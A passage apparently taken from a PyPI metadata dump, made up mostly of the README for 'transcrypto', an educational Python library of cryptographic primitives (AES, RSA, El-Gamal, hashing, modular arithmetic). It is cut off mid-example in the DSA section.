] | twine/6.2.0 CPython/3.13.2 | 2026-02-20T09:28:32.528551 | iqlabs_solana_sdk-0.1.5.tar.gz | 38,688 | 8a/b5/f6f4673e694551c6688d712e9b2e5142e335344434b76bb991f6aee6728d/iqlabs_solana_sdk-0.1.5.tar.gz | source | sdist | null | false | bbe258888da1bc0391b53dc75cb606c2 | d97566293a9149f503d1847caf183858d9c821a4b9216f88531b5a870e7919e7 | 8ab5f6f4673e694551c6688d712e9b2e5142e335344434b76bb991f6aee6728d | Apache-2.0 | [
"LICENSE"
] | 227 |
2.3 | transcrypto | 2.3.2 | Basic crypto primitives, not intended for actual use, but as a companion to --Criptografia, Métodos e Algoritmos-- | # TransCrypto
Basic cryptography primitives implementation, a companion to *"Criptografia, Métodos e Algoritmos"*.
Started in July/2025, by Daniel Balparda. Since version 1.0.2 it is PyPI package:
<https://pypi.org/project/transcrypto/>
- [TransCrypto](#transcrypto)
- [License](#license)
- [Design assumptions / Disclaimers](#design-assumptions--disclaimers)
- [CLI Apps](#cli-apps)
- [Programming API](#programming-api)
- [Install](#install)
- [Base Library](#base-library)
- [Humanized Sizes (IEC binary)](#humanized-sizes-iec-binary)
- [Humanized Decimal Quantities (SI)](#humanized-decimal-quantities-si)
- [Humanized Durations](#humanized-durations)
- [Execution Timing](#execution-timing)
- [Context manager](#context-manager)
- [Decorator](#decorator)
- [Manual use](#manual-use)
- [Key points](#key-points)
- [Serialization Pipeline](#serialization-pipeline)
- [Serialize](#serialize)
- [DeSerialize](#deserialize)
- [Cryptographically Secure Randomness](#cryptographically-secure-randomness)
- [Fixed-size random integers](#fixed-size-random-integers)
- [Uniform random integers in a range](#uniform-random-integers-in-a-range)
- [In-place secure shuffle](#in-place-secure-shuffle)
- [Random byte strings](#random-byte-strings)
- [Computing the Greatest Common Divisor](#computing-the-greatest-common-divisor)
- [Fast Modular Arithmetic](#fast-modular-arithmetic)
- [Chinese Remainder Theorem (CRT) – Pair](#chinese-remainder-theorem-crt--pair)
- [Modular Polynomials \& Lagrange Interpolation](#modular-polynomials--lagrange-interpolation)
- [Primality testing \& Prime generators, Mersenne primes](#primality-testing--prime-generators-mersenne-primes)
- [Cryptographic Hashing](#cryptographic-hashing)
- [SHA-256 hashing](#sha-256-hashing)
- [SHA-512 hashing](#sha-512-hashing)
- [File hashing](#file-hashing)
- [Symmetric Encryption Interface](#symmetric-encryption-interface)
- [Crypto Objects General Properties (`CryptoKey`)](#crypto-objects-general-properties-cryptokey)
- [AES-256 Symmetric Encryption](#aes-256-symmetric-encryption)
- [Key creation](#key-creation)
- [AES-256 + GCM (default)](#aes-256--gcm-default)
- [AES-256 + ECB (unsafe, fixed block only)](#aes-256--ecb-unsafe-fixed-block-only)
- [RSA (Rivest-Shamir-Adleman) Public Cryptography](#rsa-rivest-shamir-adleman-public-cryptography)
- [El-Gamal Public-Key Cryptography](#el-gamal-public-key-cryptography)
- [DSA (Digital Signature Algorithm)](#dsa-digital-signature-algorithm)
- [Security notes](#security-notes)
- [Advanced: custom primes generator](#advanced-custom-primes-generator)
- [Public Bidding](#public-bidding)
- [SSS (Shamir Shared Secret)](#sss-shamir-shared-secret)
- [Appendix: Development Instructions](#appendix-development-instructions)
- [Setup](#setup)
- [Updating Dependencies](#updating-dependencies)
- [Creating a New Version](#creating-a-new-version)
## License
Copyright 2026 Daniel Balparda <balparda@github.com>
Licensed under the ***Apache License, Version 2.0*** (the "License"); you may not use this file except in compliance with the License. You may obtain a [copy of the License here](http://www.apache.org/licenses/LICENSE-2.0).
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
## Design assumptions / Disclaimers
- The library is built to provide reference, reliable, simple implementations of math and crypto primitives (e.g. `RawEncrypt()`/`RawSign()` and friends, plus all the low-level primality and modular arithmetic). The issue is not that the library is unsafe; it is that it is full of places that let you shoot yourself in the foot if you don't know what you are doing.
- The library also has advanced top-level methods that are cryptographically safe and might be used in real-world scenarios (e.g. `Encrypt()`/`Sign()` and friends).
- All library methods taking `int` arguments are tailored to be efficient with arbitrarily large integers.
- Everything **should work**, as the library is **extensively tested**, *but it is not necessarily the most efficient or safest option for real-world cryptographic use.* For real-world crypto, consider *other optimized/safe libraries* built to resist malicious attacks.
- *All operations in this library may be vulnerable to timing attacks.* Whether this is a problem depends on your use case.
All that being said, extreme care was taken to make this a good library with a solid, safe implementation. *Have fun!*
## CLI Apps
- [TransCrypto/`transcrypto`](transcrypto.md): Does all the operations but allows you to shoot yourself in the foot;
- [Profiler/`profiler`](profiler.md): Measure transcrypto performance.
## Programming API
### Install
To use in your project just do:
```sh
pip3 install transcrypto
```
and then `from transcrypto.core import rsa` (or other parts of the library) to use it.
Known dependencies:
- [zstandard](https://pypi.org/project/zstandard/) ([docs](https://python-zstandard.readthedocs.org/))
- [cryptography](https://pypi.org/project/cryptography/) ([docs](https://cryptography.io/en/latest/))
- [gmpy2](https://pypi.org/project/gmpy2/) ([docs](https://gmpy2.readthedocs.io/en/latest/))
### Base Library
#### Humanized Sizes (IEC binary)
```py
from transcrypto.utils import human
human.HumanizedBytes(512) # '512 B'
human.HumanizedBytes(2048) # '2.000 KiB'
human.HumanizedBytes(5 * 1024**3) # '5.000 GiB'
```
Converts raw byte counts to binary-prefixed strings (`B`, `KiB`, `MiB`, `GiB`, `TiB`, `PiB`, `EiB`).
- For integer inputs `<1024`, returns an integer count with `B` (e.g. `'512 B'`).
- For float inputs `<1024`, returns 3 decimals with `B` (e.g. `'51.200 B'`).
- For values `≥1024`, returns 3 decimals.
- standard: 1 KiB = 1024 B, 1 MiB = 1024 KiB, …
- errors: negative inputs raise `base.InputError`
#### Humanized Decimal Quantities (SI)
```py
from transcrypto.utils import human
# Base (unitless)
human.HumanizedDecimal(950) # '950'
human.HumanizedDecimal(1500) # '1.500 k'
# With a unit (trimmed and attached)
human.HumanizedDecimal(1500, unit=' Hz ') # '1.500 kHz'
human.HumanizedDecimal(0.123456, unit='V') # '123.456 mV'
# Large magnitudes
human.HumanizedDecimal(3_200_000) # '3.200 M'
human.HumanizedDecimal(7.2e12, unit='B/s') # '7.200 TB/s'
```
Scales by powers of 1000 using SI prefixes to keep the displayed value in roughly `[1, 1000)` when possible.
- Supported large prefixes: `k`, `M`, `G`, `T`, `P`, `E`
- Supported small prefixes: `m`, `µ`, `n`, `p`, `f`, `a`
- Formatting uses 3 decimals both for scaled values and for non-integer unscaled values.
- unit handling: `unit` is stripped; `<1000` values include a space before the unit (`'950 Hz'`)
- errors: non-finite inputs raise `base.InputError` (negative values are supported and keep a leading `-`)
#### Humanized Durations
```py
from transcrypto.utils import human
human.HumanizedSeconds(0) # '0.000 s'
human.HumanizedSeconds(0.000004) # '4.000 µs'
human.HumanizedSeconds(0.25) # '250.000 ms'
human.HumanizedSeconds(42) # '42.000 s'
human.HumanizedSeconds(3661) # '1.017 h'
human.HumanizedSeconds(172800) # '2.000 d'
```
Chooses an appropriate time unit based on magnitude and formats with fixed precision:
- `< 1 ms`: microseconds with three decimals (`µs`)
- `< 1 s`: milliseconds with three decimals (`ms`)
- `< 60 s`: seconds with three decimals (`s`)
- `< 60 min`: minutes with three decimals (`min`)
- `< 24 h`: hours with three decimals (`h`)
- `≥ 24 h`: days with three decimals (`d`)
- special case: `0 → '0.000 s'`
- errors: negative or non-finite inputs raise `base.InputError`
#### Execution Timing
A flexible timing utility that works as a **context manager**, **decorator**, or **manual timer object**.
```py
from transcrypto.utils import timer
import time
```
##### Context manager
```py
with timer.Timer('Block timing'):
  time.sleep(1.2)
# → logs: "Block timing: 1.200 s" (default via logging.info)
```
Starts timing on entry, stops on exit, and reports elapsed time automatically.
##### Decorator
```py
@timer.Timer('Function timing')
def slow_function():
  time.sleep(0.8)

slow_function()
# → logs: "Function timing: 0.800 s"
```
Wraps a function so that each call is automatically timed.
##### Manual use
```py
tm = timer.Timer('Inline timing', emit_print=True)
tm.Start()
time.sleep(0.1)
tm.Stop() # prints: "Inline timing: 0.100 s"
```
Manual control over `Start()` and `Stop()` for precise measurement of custom intervals.
##### Key points
- **Label**: optional; if empty, output omits the label prefix
- **Output**:
- `emit_log=True` → `logging.info()` (default)
- `emit_print=True` → prints via `rich.console.Console().print()`
- Both can be enabled
- **Format**: elapsed time is shown using `HumanizedSeconds()`
- **Safety**:
- Cannot start an already started timer
- Cannot stop an unstarted or already stopped timer
(raises `Error`)
#### Serialization Pipeline
These helpers turn arbitrary Python objects into compressed and/or encrypted binary blobs, and back again — with detailed timing and size logging.
```py
from transcrypto.core import key
```
##### Serialize
```py
data = {'x': 42, 'y': 'hello'}
# Basic serialization
blob = key.Serialize(data)
# With compression and encryption
blob = key.Serialize(
    data,
    compress=9,                   # compression level (-22..22, default=3)
    encryption_key=my_encryptor,  # must implement `key.Encryptor` (e.g., `aes.AESKey`)
)
# Save directly to file
key.Serialize(data, file_path='/tmp/data.blob')
```
Serialization path:
```text
obj → pickle → (compress) → (encrypt) → (save)
```
At each stage:
- Data size is measured using `HumanizedBytes`
- Duration is timed with `Timer`
- Results are logged once at the end
Compression levels:
`compress` uses `zstandard`; see table below for speed/ratio trade-offs:
| Level | Speed | Compression ratio | Typical use case |
| -------- | ------------| --------------------------------- | --------------------------------------- |
| -5 to -1 | Fastest | Poor (better than no compression) | Real-time or very latency-sensitive |
| 0…3 | Very fast | Good ratio | Default CLI choice, safe baseline |
| 4…6 | Moderate | Better ratio | Good compromise for general persistence |
| 7…10 | Slower | Marginally better ratio | Only if storage space is precious |
| 11…15 | Much slower | Slight gains | Large archives, not for runtime use |
| 16…22 | Very slow | Tiny gains | Archival-only, multi-GB datasets |
Errors: invalid compression level is clamped to range; other input errors raise `base.InputError`.
##### DeSerialize
```py
# From in-memory blob
obj = key.DeSerialize(data=blob)
# From file
obj = key.DeSerialize(file_path='/tmp/data.blob')
# With decryption
obj = key.DeSerialize(data=blob, decryption_key=my_decryptor)
```
Deserialization path:
```text
data/file → (decrypt) → (decompress if Zstd) → unpickle
```
- Compression is auto-detected via Zstandard magic numbers.
- All steps are timed/logged like in `Serialize`.
**Constraints & errors**:
- Exactly one of `data` or `file_path` must be provided.
- `file_path` must exist; `data` must be at least 4 bytes.
- Wrong key / authentication failure can raise `key.CryptoError`.
- Corrupted compressed blobs typically raise `zstandard.ZstdError` during decompression.
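The compression auto-detection mentioned above works because every Zstandard frame starts with a fixed magic number (`0xFD2FB528`, stored little-endian). A minimal, library-independent sketch of that check:

```python
# Zstandard frames start with the magic number 0xFD2FB528, stored
# little-endian, so the first four bytes of a frame are 28 B5 2F FD.
ZSTD_MAGIC = (0xFD2FB528).to_bytes(4, 'little')  # b'\x28\xb5\x2f\xfd'


def looks_like_zstd(data: bytes) -> bool:
  """Heuristic: does this blob start with a Zstandard frame header?"""
  return len(data) >= 4 and data[:4] == ZSTD_MAGIC


print(looks_like_zstd(ZSTD_MAGIC + b'payload'))  # → True
print(looks_like_zstd(b'\x80\x04\x95'))          # → False (raw pickle prefix)
```

This also explains the "`data` must be at least 4 bytes" constraint: fewer bytes are not enough to decide whether the blob is compressed.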
#### Cryptographically Secure Randomness
These helpers live in `saferandom` and wrap Python’s `secrets` with additional checks and guarantees for crypto use-cases.
```py
from transcrypto.core import saferandom
```
##### Fixed-size random integers
```py
# Generate a 256-bit integer (first bit always set)
r = saferandom.RandBits(256)
assert r.bit_length() == 256
```
Produces a crypto-secure random integer with exactly `n_bits` bits (`≥ 8`). The most significant bit is guaranteed to be `1`, so entropy is \~`n_bits−1` — negligible for large crypto sizes.
- errors: `n_bits < 8` → `base.InputError`
##### Uniform random integers in a range
```py
# Uniform between [10, 20] inclusive
n = saferandom.RandInt(10, 20)
assert 10 <= n <= 20
```
Returns a crypto-secure integer uniformly distributed over the closed interval `[min_int, max_int]`.
- constraints: `min_int ≥ 0` and `< max_int`
- errors: invalid bounds → `base.InputError`
##### In-place secure shuffle
```py
deck = list(range(10))
saferandom.RandShuffle(deck)
print(deck) # securely shuffled order
```
Performs an in-place Fisher–Yates shuffle using `secrets.randbelow`. Suitable for sensitive data ordering.
- constraints: sequence length ≥ 2
- errors: shorter sequences → `base.InputError`
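For reference, the in-place Fisher–Yates pattern described above can be sketched with the standard library alone (an illustrative stand-in, not the library's actual code):

```python
import secrets


def fisher_yates_shuffle(seq: list) -> None:
  """In-place Fisher-Yates shuffle driven by a CSPRNG."""
  for i in range(len(seq) - 1, 0, -1):
    j = secrets.randbelow(i + 1)  # uniform in [0, i]
    seq[i], seq[j] = seq[j], seq[i]


deck = list(range(10))
fisher_yates_shuffle(deck)
print(sorted(deck))  # → [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] — same elements, new order
```

Using `secrets.randbelow` instead of `random.randrange` is what makes the ordering safe for sensitive data.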
##### Random byte strings
```py
# 32 random bytes
b = saferandom.RandBytes(32)
assert len(b) == 32
```
Generates `n_bytes` of high-quality crypto-secure random data.
- constraints: `n_bytes ≥ 1`
- errors: smaller values → `base.InputError`
#### Computing the Greatest Common Divisor
```py
>>> from transcrypto.core import modmath
>>> modmath.GCD(462, 1071)
21
>>> modmath.GCD(0, 17)
17
```
The function is `O(log(min(a, b)))` and handles arbitrarily large integers. To find Bézout coefficients `(x, y)` such that `ax + by = gcd(a, b)` do:
```py
>>> modmath.ExtendedGCD(462, 1071)
(21, 7, -3)
>>> 462 * 7 + 1071 * (-3)
21
```
Use-cases:
- modular inverses: `inv = x % m` when `gcd(a, m) == 1`
- solving linear Diophantine equations
- RSA / ECC key generation internals
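To make the modular-inverse use-case concrete, here is a self-contained sketch of the extended-GCD recurrence (pure Python, not the library's implementation):

```python
def extended_gcd(a: int, b: int) -> tuple[int, int, int]:
  """Return (g, x, y) such that a*x + b*y == g == gcd(a, b)."""
  old_r, r = a, b
  old_x, x = 1, 0
  old_y, y = 0, 1
  while r:
    q = old_r // r
    old_r, r = r, old_r - q * r
    old_x, x = x, old_x - q * x
    old_y, y = y, old_y - q * y
  return old_r, old_x, old_y


g, x, y = extended_gcd(462, 1071)
print(g, 462 * x + 1071 * y)  # → 21 21

# Modular inverse of 3 (mod 7): gcd(3, 7) == 1, so x % 7 is the inverse.
g, x, _ = extended_gcd(3, 7)
print(x % 7)  # → 5, since 3 * 5 % 7 == 1
```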
#### Fast Modular Arithmetic
```py
from transcrypto.core import modmath
m = 2**256 - 189 # a large prime modulus
# Inverse ──────────────────────────────
x = 123456789
x_inv = modmath.ModInv(x, m)
assert (x * x_inv) % m == 1
# Division (x / y) mod m ──────────────
y = 987654321
z = modmath.ModDiv(x, y, m) # solves z·y ≡ x (mod m)
assert (z * y) % m == x % m
# Exponentiation ──────────────────────
exp = modmath.ModExp(3, 10**20, m) # ≈ log₂(y) time, handles huge exponents
```
##### Chinese Remainder Theorem (CRT) – Pair
```py
from transcrypto.core import modmath
# Solve:
# x ≡ 2 (mod 3)
# x ≡ 3 (mod 5)
x = modmath.CRTPair(2, 3, 3, 5)
print(x) # 8
assert x % 3 == 2
assert x % 5 == 3
```
Solves a system of two simultaneous congruences with **pairwise co-prime** moduli, returning the **least non-negative solution** `x` such that:
```text
x ≡ a1 (mod m1)
x ≡ a2 (mod m2)
0 ≤ x < m1 * m2
```
- **Requirements**:
- `m1 ≥ 2`, `m2 ≥ 2`, `m1 != m2`
- `gcd(m1, m2) == 1` (co-prime)
- **Errors**:
- invalid modulus values → `base.InputError`
- non co-prime moduli → `ModularDivideError`
This function is a 2-modulus variant; for multiple moduli, apply it iteratively or use a general CRT solver.
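Iterating the pair-wise solver works because combining two congruences yields one congruence modulo the product of the moduli. A sketch with pure-Python stand-ins (`crt_pair`/`crt_many` are hypothetical names with the same contract as `CRTPair`):

```python
from math import gcd


def crt_pair(a1: int, m1: int, a2: int, m2: int) -> int:
  """Least non-negative x with x ≡ a1 (mod m1) and x ≡ a2 (mod m2)."""
  assert gcd(m1, m2) == 1  # co-prime moduli required
  t = ((a2 - a1) * pow(m1, -1, m2)) % m2  # pow(m1, -1, m2): modular inverse
  return (a1 + m1 * t) % (m1 * m2)


def crt_many(residues: list[tuple[int, int]]) -> int:
  """Fold crt_pair over a list of (residue, modulus) pairs."""
  a, m = residues[0]
  for a2, m2 in residues[1:]:
    a, m = crt_pair(a, m, a2, m2), m * m2
  return a


x = crt_many([(2, 3), (3, 5), (2, 7)])
print(x)  # → 23: 23 % 3 == 2, 23 % 5 == 3, 23 % 7 == 2
```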
##### Modular Polynomials & Lagrange Interpolation
```py
# f(t) = 7t³ − 3t² + 2t + 5 (coefficients constant-term first)
coefficients = [5, 2, -3, 7]
print(modmath.ModPolynomial(11, coefficients, 97)) # → 19
# Given three points build the degree-≤2 polynomial and evaluate it.
pts = {2: 4, 5: 3, 7: 1}
print(modmath.ModLagrangeInterpolate(9, pts, 11)) # → 2
```
#### Primality testing & Prime generators, Mersenne primes
```py
modmath.IsPrime(2**127 - 1) # True (Mersenne prime)
modmath.IsPrime(3825123056546413051) # False (strong pseudo-prime)
# Direct Miller–Rabin with custom witnesses
modmath.MillerRabinIsPrime(961748941, witnesses={2,7,61})
# Infinite iterator of primes ≥ 10⁶
for p in modmath.PrimeGenerator(1_000_000):
  print(p)
  if p > 1_000_100:
    break
# Secure random 384-bit prime (for RSA/ECC experiments)
p384 = modmath.NBitRandomPrimes(384).pop()
for k, m_p, perfect in modmath.MersennePrimesGenerator(0):
  print(f'p = {k:>8} M = {m_p} perfect = {perfect}')
  if k > 10000:  # stop after a few
    break
```
#### Cryptographic Hashing
Simple, fixed-output-size wrappers over Python’s `hashlib` for common digest operations, plus file hashing.
```py
from transcrypto.core import hashes
```
##### SHA-256 hashing
```py
h = hashes.Hash256(b'hello world')
assert len(h) == 32 # bytes
print(h.hex()) # 64 hex chars
```
Computes the SHA-256 digest of a byte string, returning exactly 32 bytes (256 bits). Suitable for fingerprints, commitments, or internal crypto primitives.
##### SHA-512 hashing
```py
h = hashes.Hash512(b'hello world')
assert len(h) == 64 # bytes
print(h.hex()) # 128 hex chars
```
Computes the SHA-512 digest of a byte string, returning exactly 64 bytes (512 bits). Higher collision resistance and larger output space than SHA-256.
##### File hashing
```py
# Default SHA-256
fh = hashes.FileHash('/path/to/file')
print(fh.hex())
# SHA-512
fh2 = hashes.FileHash('/path/to/file', digest='sha512')
```
Hashes a file from disk in streaming mode. By default uses SHA-256; `digest='sha512'` switches to SHA-512.
- constraints:
- `digest` must be `'sha256'` or `'sha512'`
- `full_path` must exist
- errors: invalid digest or missing file → `base.InputError`
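Streaming-mode hashing avoids loading the whole file into memory. The general pattern, sketched with plain `hashlib` (not necessarily this library's code):

```python
import hashlib
import os
import tempfile


def stream_hash(path: str, algo: str = 'sha256', chunk_size: int = 1 << 20) -> bytes:
  """Hash a file in fixed-size chunks so memory usage stays bounded."""
  h = hashlib.new(algo)
  with open(path, 'rb') as f:
    while chunk := f.read(chunk_size):
      h.update(chunk)
  return h.digest()


# Demo: the streamed digest matches a one-shot digest of the same data.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
  tmp.write(b'hello world' * 1000)
digest = stream_hash(tmp.name)
assert digest == hashlib.sha256(b'hello world' * 1000).digest()
os.unlink(tmp.name)
```

Pass `algo='sha512'` for the larger digest, mirroring the `digest='sha512'` option above.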
#### Symmetric Encryption Interface
`key.Encryptor` and `key.Decryptor` are runtime-checkable protocols that define the **byte-in / byte-out** contract for symmetric ciphers.
- **Metadata handling** — if the algorithm uses a `nonce` or `tag`, the implementation must handle it internally (e.g., append it to ciphertext).
- **AEAD modes** — if supported, `associated_data` must be authenticated; otherwise, a non-`None` value should raise `base.InputError`.
```py
from transcrypto.core import key
class MyAES(key.Encryptor, key.Decryptor):

  def Encrypt(self, plaintext: bytes, *, associated_data=None) -> bytes:
    ...

  def Decrypt(self, ciphertext: bytes, *, associated_data=None) -> bytes:
    ...
```
#### Crypto Objects General Properties (`CryptoKey`)
Cryptographic objects all derive from the `CryptoKey` class and share some important characteristics:
- Will be safe to log and print, i.e., implement safe `__str__()` and `__repr__()` methods (in actuality `repr` is exactly the same as `str`). `__str__()` always fully prints the public parts of the object and obfuscates the private ones. This obfuscation allows for some debugging, if needed, but if the secrets are "too short" it can be defeated by brute force; for usual crypto defaults the obfuscation is fine. The obfuscation is the first 4 bytes of the SHA-512 of the value, followed by an ellipsis (e.g. `c9626f16…`).
- It will have a `_DebugDump()` method that **does print secrets** and can be used for **debugging only**.
- Can be easily serialized to `bytes` by the `blob` property and to base-64 encoded `str` by the `encoded` property.
- Can be serialized encrypted to `bytes` by the `Blob(encryption_key=[key.Encryptor])` method and to encrypted base-64 encoded `str` by the `Encoded(encryption_key=[key.Encryptor])` method.
- Can be instantiated back as an object from `str` or `bytes` using the `Load(data, decryption_key=[key.Decryptor] | None)` method. The `Load()` will decide how to build the object and will work universally with all the serialization options discussed above.
Example:
<!-- cspell:disable -->
```py
from transcrypto.core import aes, rsa
priv = rsa.RSAPrivateKey.New(512) # small key, but good for this example
print(str(priv)) # safe, no secrets
# ▶ RSAPrivateKey(RSAPublicKey(public_modulus=pQaoxy-QeXSds1k9WsGjJw==, encrypt_exp=AQAB), modulus_p=f18141aa…, modulus_q=67494eb9…, decrypt_exp=c96db24a…)
print(priv._DebugDump()) # UNSAFE: prints secrets
# ▶ RSAPrivateKey(public_modulus=219357196311600536151291741191131996967, encrypt_exp=65537, modulus_p=13221374197986739361, modulus_q=16591104148992527047, decrypt_exp=37805202135275158391322585315542443073, remainder_p=9522084656682089473, remainder_q=8975656462800098363, q_inverse_p=11965562396596149292)
print(priv.blob)
# ▶ b"(\xb5/\xfd \x98\xc1\x04\x00\x80\x04\x95\x8d\x00\x00\x00\x00\x00\x00\x00\x8c\x0ftranscrypto.rsa\x94\x8c\rRSAPrivateKey\x94\x93\x94)\x81\x94]\x94(\x8a\x11'\xa3\xc1Z=Y\xb3\x9dty\x90/\xc7\xa8\x06\xa5\x00J\x01\x00\x01\x00\x8a\t\xa1\xc4\x83\x81\xc8\xc1{\xb7\x00\x8a\t\xc7\x8a5\xf0Qq?\xe6\x00\x8a\x10A$&\x82!\x1cy\x89r\xef\xeb\xa7_\x04q\x1c\x8a\t\x01\xbc\xbb\x8a\x8b=%\x84\x00\x8a\x08;\x94#s\xff\xef\x8f|\x8a\t,\x9c\xe2z\x9a7\x0e\xa6\x00eb."
print(priv.encoded)
# ▶ KLUv_WBwAIELAIAElWUBAAAAAAAAjA90cmFuc2NyeXB0by5yc2GUjA1SU0FQcml2YXRlS2V5lJOUKYGUXZQoikHf1EvsmZedAZve7TrLmobLAwuRIr_77TLG6G_0fsLGThERVJu075be8PLjUQYnLXcacZFQ5Fb1Iy1WtiE985euAEoBAAEAiiFR9ngiXMzkf41o5CRBY3h0D4DJVisDDhLmAWsiaHggzQCKIS_cmQ6MKXCtROtC7c_Mrsi9A-9NM8DksaHaRwvy6uTZAIpB4TVbsLxc41TEc19wIzpxbi9y5dW5gdfTkRQSSiz0ijmb8Xk3pyBfKAv8JbHp8Yv48gNZUfX67qq0J7yhJqeUoACKIbFb2kTNRzSqm3JRtjc2BPS-FnLFdadlFcV4-6IW7eqLAIogFZfzDN39gZLR9uTz4KHSTaqxWrJgP8-YYssjss6FlFKKIIItgCDv7ompNpY8gBs5bibN8XTsr-JOYSntDVT5Fe5vZWIu
aes_key = aes.AESKey(key256=b'x' * 32)
print(aes_key)
# ▶ AESKey(key256=86a86df7…)
encrypted = priv.Blob(encryption_key=aes_key)
print(priv == rsa.RSAPrivateKey.Load(encrypted, decryption_key=aes_key))
# ▶ True
```
<!-- cspell:enable -->
#### AES-256 Symmetric Encryption
Implements AES-256 in **GCM mode** for authenticated encryption and decryption, plus an **ECB mode** helper for fixed-size block encoding.
Also includes a high-iteration PBKDF2-based key derivation from static passwords.
##### Key creation
```py
from transcrypto.core import aes
# From raw bytes (must be exactly 32 bytes)
aes_key = aes.AESKey(key256=b'\x00' * 32)
# From a static password (slow, high-iteration PBKDF2-SHA256)
aes_key = aes.AESKey.FromStaticPassword('correct horse battery staple')
print(aes_key.encoded) # URL-safe Base64
```
- **Length**: `key256` must be exactly 32 bytes
- `FromStaticPassword()`:
- Uses PBKDF2-HMAC-SHA256 with **fixed** salt and \~2 million iterations
- Designed for **interactive** password entry, **not** for password databases
##### AES-256 + GCM (default)
```py
data = b'secret message'
aad = b'metadata'
# Encrypt (returns IV + ciphertext + tag)
ct = aes_key.Encrypt(data, associated_data=aad)
# Decrypt
pt = aes_key.Decrypt(ct, associated_data=aad)
assert pt == data
```
- **Security**:
- Random 128-bit IV (`iv`) per encryption
- Authenticated tag (128-bit) ensures integrity
- Optional `associated_data` is authenticated but not encrypted
- **Errors**:
- Tag mismatch or wrong key → `key.CryptoError`
##### AES-256 + ECB (unsafe, fixed block only)
```py
# ECB mode is for 16-byte block encoding ONLY
ecb = aes_key.ECBEncoder()
block = b'16-byte string!!'
ct_block = ecb.Encrypt(block)
pt_block = ecb.Decrypt(ct_block)
assert pt_block == block
# Hex helpers
hex_ct = ecb.EncryptHex('00112233445566778899aabbccddeeff') # 128 bits (1 block)
hex_pt = ecb.DecryptHex(hex_ct)
assert hex_pt == '00112233445566778899aabbccddeeff'
hex_ct2 = ecb.EncryptHex256('00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff')
hex_pt2 = ecb.DecryptHex256(hex_ct2)
assert hex_pt2 == '00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff'
```
- **ECB mode**:
- 16-byte plaintext ↔ 16-byte ciphertext
- No padding, no IV, no integrity — **do not use for general encryption**
- `associated_data` not supported
Key points:
- **GCM mode** is secure for general use; ECB mode is for special low-level operations
- **Static password derivation** is intentionally slow to resist brute force
- All sizes and parameters are validated with `base.InputError` on misuse
#### RSA (Rivest-Shamir-Adleman) Public Cryptography
<https://en.wikipedia.org/wiki/RSA_cryptosystem>
This implementation is raw RSA, no OAEP or PSS! It works on the actual integers. For real uses you should look for higher-level implementations.
By default, and by deliberate choice, the *encryption exponent* will be either 7 or 65537, depending on the size of `phi=(p-1)*(q-1)`: if `phi` allows it, the larger one is chosen, to avoid Coppersmith attacks.
```py
from transcrypto.core import rsa
# Generate a key pair
priv = rsa.RSAPrivateKey.New(2048) # 2048-bit modulus
pub = rsa.RSAPublicKey.Copy(priv) # public half
print(priv.public_modulus.bit_length()) # 2048
# Safe Encrypt & decrypt
msg = b'xyz'
cipher = pub.Encrypt(msg, associated_data=b'aad')
plain = priv.Decrypt(cipher, associated_data=b'aad')
assert plain == msg
# Safe Sign & verify
signature = priv.Sign(msg) # can also have associated_data, optionally
assert pub.Verify(msg, signature)
# Raw Encrypt & decrypt
msg = 123456789 # (Zero is forbidden by design; smallest valid message is 1.)
cipher = pub.RawEncrypt(msg)
plain = priv.RawDecrypt(cipher)
assert plain == msg
# Raw Sign & verify
signature = priv.RawSign(msg)
assert pub.RawVerify(msg, signature)
# Blind signatures (obfuscation pair) - only works on raw RSA
pair = rsa.RSAObfuscationPair.New(pub)
blind_msg = pair.ObfuscateMessage(msg) # what you send to signer
blind_sig = priv.RawSign(blind_msg) # signer’s output
sig = pair.RevealOriginalSignature(msg, blind_sig)
assert pub.RawVerify(msg, sig)
```
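The exponent-selection rule described above (prefer 65537 over 7 when `phi` allows it) can be sketched in pure Python; `pick_encrypt_exp` is a hypothetical helper illustrating the stated rule, not the library's actual code:

```python
from math import gcd


def pick_encrypt_exp(phi: int) -> int:
  """Prefer 65537; fall back to 7 for tiny moduli (sketch of the stated rule)."""
  for e in (65537, 7):
    if e < phi and gcd(e, phi) == 1:  # e must be invertible mod phi
      return e
  raise ValueError('no suitable encryption exponent')


print(pick_encrypt_exp((61 - 1) * (53 - 1)))  # → 7 (phi too small for 65537)
print(pick_encrypt_exp(10**10))               # → 65537
```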
#### El-Gamal Public-Key Cryptography
[https://en.wikipedia.org/wiki/ElGamal\_encryption](https://en.wikipedia.org/wiki/ElGamal_encryption)
This is **raw El-Gamal** over a prime field — no padding, no hashing — and is **not** DSA.
For real-world deployments, use a high-level library with authenticated encryption and proper encoding.
```py
from transcrypto.core import elgamal
# Shared parameters (prime modulus, group base) for a group
shared = elgamal.ElGamalSharedPublicKey.NewShared(256)
print(shared.prime_modulus)
print(shared.group_base)
# Public key from private
priv = elgamal.ElGamalPrivateKey.New(shared)
pub = elgamal.ElGamalPublicKey.Copy(priv)
# Safe Encrypt & decrypt
msg = b'xyz'
cipher = pub.Encrypt(msg, associated_data=b'aad')
plain = priv.Decrypt(cipher, associated_data=b'aad')
assert plain == msg
# Safe Sign & verify
signature = priv.Sign(msg) # can also have associated_data, optionally
assert pub.Verify(msg, signature)
# Raw Encryption
msg = 42
cipher = pub.RawEncrypt(msg)
plain = priv.RawDecrypt(cipher)
assert plain == msg
# Raw Signature verify
sig = priv.RawSign(msg)
assert pub.RawVerify(msg, sig)
```
Key points:
- **Security parameters**:
- Recommended `prime_modulus` bit length ≥ 2048 for real security
- Random values from `saferandom.RandBits`
- **Ephemeral keys**:
- Fresh per encryption/signature
- Must satisfy `gcd(k, p-1) == 1`
- **Errors**:
- Bad ranges → `base.InputError`
- Invalid math relationships → `key.CryptoError`
- **Group sharing**:
- Multiple parties can share `(p, g)` but have different `(individual_base, decrypt_exp)`
#### DSA (Digital Signature Algorithm)
[https://en.wikipedia.org/wiki/Digital\_Signature\_Algorithm](https://en.wikipedia.org/wiki/Digital_Signature_Algorithm)
This is **raw DSA** over a prime field — **no hashing or padding**. You sign/verify **integers** modulo `q` (`prime_seed`). For real use, hash the message first (e.g., SHA-256) and then map to an integer `< q`.
```py
from transcrypto.core import dsa
# Shared parameters (p, q, g) - Safe Sign/Verify requires q > 512 bits
